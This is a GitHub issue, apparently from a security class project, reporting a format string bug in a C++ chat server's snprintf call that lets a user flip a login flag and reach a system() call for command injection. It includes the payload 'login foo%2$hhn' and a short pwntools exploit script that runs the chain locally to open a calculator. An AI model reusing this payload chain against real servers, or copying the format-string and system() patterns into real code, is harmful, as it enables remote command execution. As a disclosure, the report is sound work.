Skip to content
This repository has been archived by the owner on May 29, 2023. It is now read-only.

Format string vulnerability found #8

Open
yannvon opened this issue May 13, 2019 · 1 comment
Open

Format string vulnerability found #8

yannvon opened this issue May 13, 2019 · 1 comment
Assignees
@guillaumemichel
Labels
True vulnerability Actual vulnerability in the project wontfix This will not be worked on

Comments

@yannvon
Copy link

yannvon commented May 13, 2019

Where

my_ass_on_your_grass/src/services/authentication/AuthenticationService.cpp

Line 17 in 5ebeb6c

snprintf(cname, NAME_MAX_LEN, name.c_str(),0,&login);

my_ass_on_your_grass/src/commands/Commands.cpp

Lines 391 to 394 in 5ebeb6c

if (auth.getUser(socket).getLogin()){
// if user is logged in
system(pinghost.c_str());
}

What

Format string vulnerability
The AuthenticationService class has a method registerUser(), that registers a user after the login command, by creating a corresponding instance of the User class. This User class has a integer attribute called "login", that does not seem important towards the servers functionality as it is always set to 0. However, as it is passed to a vulnerable snprintf() call on line 17 of AuthenticationService.cpp, this login variable can be changed to an arbitrary value, which in turn can unlock some interesting code behavior. When after changing this login variable to a nonzero value a "ping $HOSTNAME" command is executed, the $HOSTNAME value is actually given as parameter to a system() call, which of course gives full server access to an attacker.

Exploit

1. Start both client and server
2. Perform format string attack by sending "login foo%2$hhn"
3. Profit, by sending "ping xcalc" for example, which opens a calculator.

The format string is such that first at least one character is printed ("foo"), then, as the address of the login variable on the stack is given as second parameter to the snprintf() function, the current number of characters written so far (3) can be written to that address by using the %n format string, as well as "2$" to access the second parameter.

The following python code can perform these steps when run from the project root directory:

from pwn import *

server = process('bin/server')
log.info("Waiting 1s to make sure server is up and running")
sleep(1)
client = process(['bin/client', '127.0.0.1', '8080'])

format_exploit = "login a%2$hhn"

log.info("Sending format exploit to server: " + format_exploit)
client.sendline(format_exploit)

log.info("Sending ping xcalc")
client.sendline("ping xcalc")

log.info("Sleeping 5s to display calculator")
sleep(5)

# Clean up
client.close()
server.close()
@guillaumemichel
Copy link
Collaborator

Congrats you found a vulnerability!

@guillaumemichel guillaumemichel added True vulnerability Actual vulnerability in the project wontfix This will not be worked on labels May 19, 2019
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees

@guillaumemichel guillaumemichel

Labels
True vulnerability Actual vulnerability in the project wontfix This will not be worked on
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@guillaumemichel @yannvon